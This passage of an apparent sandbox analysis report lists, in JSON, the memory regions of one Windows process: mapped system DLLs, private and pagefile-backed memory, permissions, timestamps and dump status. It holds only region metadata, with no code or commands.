"\\Windows\\SysWOW64\\userenv.dll", "id": "region_438", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1956970496, "timestamp": "00:00:39.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1960837120, "type": "region", "version": 1 }, "end_va": 1960882175, "entry_point": 1960843666, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_439", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1960837120, "timestamp": "00:00:39.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1318911, "entry_point": 0, "filename": null, "id": "region_440", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:39.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_441", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:39.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_442", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:39.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34078720, "type": "region", "version": 1 }, "end_va": 37023743, "entry_point": 34078720, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_443", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34078720, "timestamp": "00:00:39.100", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1960902656, "type": "region", "version": 1 }, "end_va": 1962598399, "entry_point": 1961092789, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_444", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1960902656, "timestamp": "00:00:39.101", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000445-addr_0x00000000001b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_445", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:39.113", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000446-addr_0x0000000000280000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_446", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:39.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1955921920, "type": "region", "version": 1 }, "end_va": 1956925439, "entry_point": 1955921920, "filename": "\\Windows\\SysWOW64\\propsys.dll", "id": "region_447", "name": "propsys.dll", "norm_filename": "c:\\windows\\syswow64\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1955921920, "timestamp": "00:00:39.113", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000448-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_448", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:39.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1965162496, "type": "region", "version": 1 }, "end_va": 1965236223, "entry_point": 1965162496, "filename": "\\Windows\\SysWOW64\\devobj.dll", "id": "region_449", "name": "devobj.dll", "norm_filename": "c:\\windows\\syswow64\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1965162496, "timestamp": "00:00:39.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967849472, "type": "region", "version": 1 }, "end_va": 1968009215, "entry_point": 1967849472, "filename": "\\Windows\\SysWOW64\\cfgmgr32.dll", "id": "region_450", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\syswow64\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967849472, "timestamp": "00:00:39.135", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1995833344, "type": "region", "version": 1 }, "end_va": 1997524991, "entry_point": 1995833344, "filename": "\\Windows\\SysWOW64\\setupapi.dll", "id": "region_451", "name": "setupapi.dll", "norm_filename": "c:\\windows\\syswow64\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1995833344, "timestamp": "00:00:39.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 41168895, "entry_point": 0, "filename": null, "id": "region_452", "name": "pagefile_0x0000000002350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37027840, "timestamp": "00:00:39.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1960775679, "entry_point": 1960645726, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_453", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:00:39.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1993211904, "type": "region", "version": 1 }, "end_va": 1993494527, "entry_point": 1993216481, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_454", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1993211904, "timestamp": "00:00:39.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_455", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:39.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 3407872, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000010.db", "id": "region_456", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db", "region_type": "memory_mapped_file", "start_va": 3407872, "timestamp": "00:00:39.252", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000457-addr_0x0000000001e80000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_457", "name": "private_0x0000000001e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 31981568, "timestamp": "00:00:39.253", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000458-addr_0x0000000002880000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42729471, "entry_point": 0, "filename": null, "id": "region_458", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:00:39.253", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1955594240, "type": "region", "version": 1 }, "end_va": 1955905535, "entry_point": 1955594240, "filename": "\\Windows\\SysWOW64\\apphelp.dll", "id": "region_459", "name": "apphelp.dll", "norm_filename": "c:\\windows\\syswow64\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1955594240, "timestamp": "00:00:39.254", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000460-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_99", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_460", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:39.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1955397632, "type": "region", "version": 1 }, "end_va": 1955586047, "entry_point": 1955397632, "filename": "\\Windows\\SysWOW64\\shdocvw.dll", "id": "region_461", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\syswow64\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1955397632, "timestamp": "00:00:39.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1957953536, "type": "region", "version": 1 }, "end_va": 1957990399, "entry_point": 1957953536, "filename": "\\Windows\\SysWOW64\\linkinfo.dll", "id": "region_462", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\syswow64\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1957953536, "timestamp": "00:00:39.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1954938880, "type": "region", "version": 1 }, "end_va": 1955397631, "entry_point": 1954938880, "filename": "\\Windows\\SysWOW64\\ntshrui.dll", "id": "region_463", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\syswow64\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1954938880, "timestamp": "00:00:39.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1954807808, "type": "region", "version": 1 }, "end_va": 1954910207, "entry_point": 1954807808, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_464", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1954807808, "timestamp": "00:00:39.406", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000465-addr_0x0000000002790000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_100", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 41746431, "entry_point": 0, "filename": null, "id": "region_465", "name": "private_0x0000000002790000", "norm_filename": null, "region_type": "private_memory", "start_va": 41484288, "timestamp": "00:00:39.419", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000466-addr_0x0000000002950000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_101", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 43319296, "type": "region", "version": 1 }, "end_va": 43581439, "entry_point": 0, "filename": null, "id": "region_466", "name": "private_0x0000000002950000", "norm_filename": null, "region_type": "private_memory", "start_va": 43319296, "timestamp": "00:00:39.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1954742272, "type": "region", "version": 1 }, "end_va": 1954787327, "entry_point": 1954742272, "filename": "\\Windows\\SysWOW64\\cscapi.dll", "id": "region_467", "name": "cscapi.dll", "norm_filename": "c:\\windows\\syswow64\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1954742272, "timestamp": "00:00:39.419", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000468-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_102", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_468", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:39.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1954676736, "type": "region", "version": 1 }, "end_va": 1954717695, "entry_point": 1954676736, "filename": "\\Windows\\SysWOW64\\slc.dll", "id": "region_469", "name": "slc.dll", "norm_filename": "c:\\windows\\syswow64\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1954676736, "timestamp": "00:00:39.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954635775, "entry_point": 1954545664, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_470", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:39.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1954283520, "type": "region", "version": 1 }, "end_va": 1954525183, "entry_point": 1954283520, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_471", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1954283520, "timestamp": "00:00:39.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 491520, "start_va": 1953759232, "type": "region", "version": 1 }, "end_va": 1954250751, "entry_point": 1953759232, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_472", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1953759232, "timestamp": "00:00:39.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1958907903, "entry_point": 1958875680, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_473", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:00:39.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_474", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:00:39.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000475-addr_0x0000000001ee0000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_103", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32636927, "entry_point": 0, "filename": null, "id": "region_475", "name": "private_0x0000000001ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32374784, "timestamp": "00:00:39.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947774975, "entry_point": 1947140096, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_476", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:00:39.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1947795456, "type": "region", "version": 1 }, "end_va": 1953738751, "entry_point": 1947795456, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_477", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1947795456, "timestamp": "00:00:39.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_478", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:00:40.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2494463, "entry_point": 0, "filename": null, "id": "region_479", "name": "pagefile_0x0000000000260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2490368, "timestamp": "00:00:40.252", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000480-addr_0x0000000000270000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_104", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_480", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:40.253", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000481-addr_0x00000000002c0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_105", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_481", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:40.253", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000482-addr_0x00000000002d0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_482", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:00:40.254", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000483-addr_0x0000000000320000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_483", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:40.254", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000484-addr_0x0000000000370000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_484", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:40.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000485-addr_0x0000000000380000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_485", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:00:40.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000486-addr_0x0000000002800000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 41943040, "type": "region", "version": 1 }, "end_va": 42205183, "entry_point": 0, "filename": null, "id": "region_486", "name": "private_0x0000000002800000", "norm_filename": null, "region_type": "private_memory", "start_va": 41943040, "timestamp": "00:00:40.255", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000487-addr_0x0000000002870000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 42401792, "type": "region", "version": 1 }, "end_va": 42467327, "entry_point": 0, "filename": null, "id": "region_487", "name": "private_0x0000000002870000", "norm_filename": null, "region_type": "private_memory", "start_va": 42401792, "timestamp": "00:00:40.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000488-addr_0x00000000028d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 42795008, "type": "region", "version": 1 }, "end_va": 43057151, "entry_point": 0, "filename": null, "id": "region_488", "name": "private_0x00000000028d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42795008, "timestamp": "00:00:40.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000489-addr_0x0000000002990000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 44630015, "entry_point": 0, "filename": null, "id": "region_489", "name": "private_0x0000000002990000", "norm_filename": null, "region_type": "private_memory", "start_va": 43581440, "timestamp": "00:00:40.257", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000490-addr_0x0000000002b10000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 45154304, "type": "region", "version": 1 }, "end_va": 45416447, "entry_point": 0, "filename": null, "id": "region_490", "name": "private_0x0000000002b10000", "norm_filename": null, "region_type": "private_memory", "start_va": 45154304, "timestamp": "00:00:40.257", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 78970879, "entry_point": 0, "filename": null, "id": "region_491", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:00:40.258", "type": "region", "version": 1 }, { "dump": { "filename": 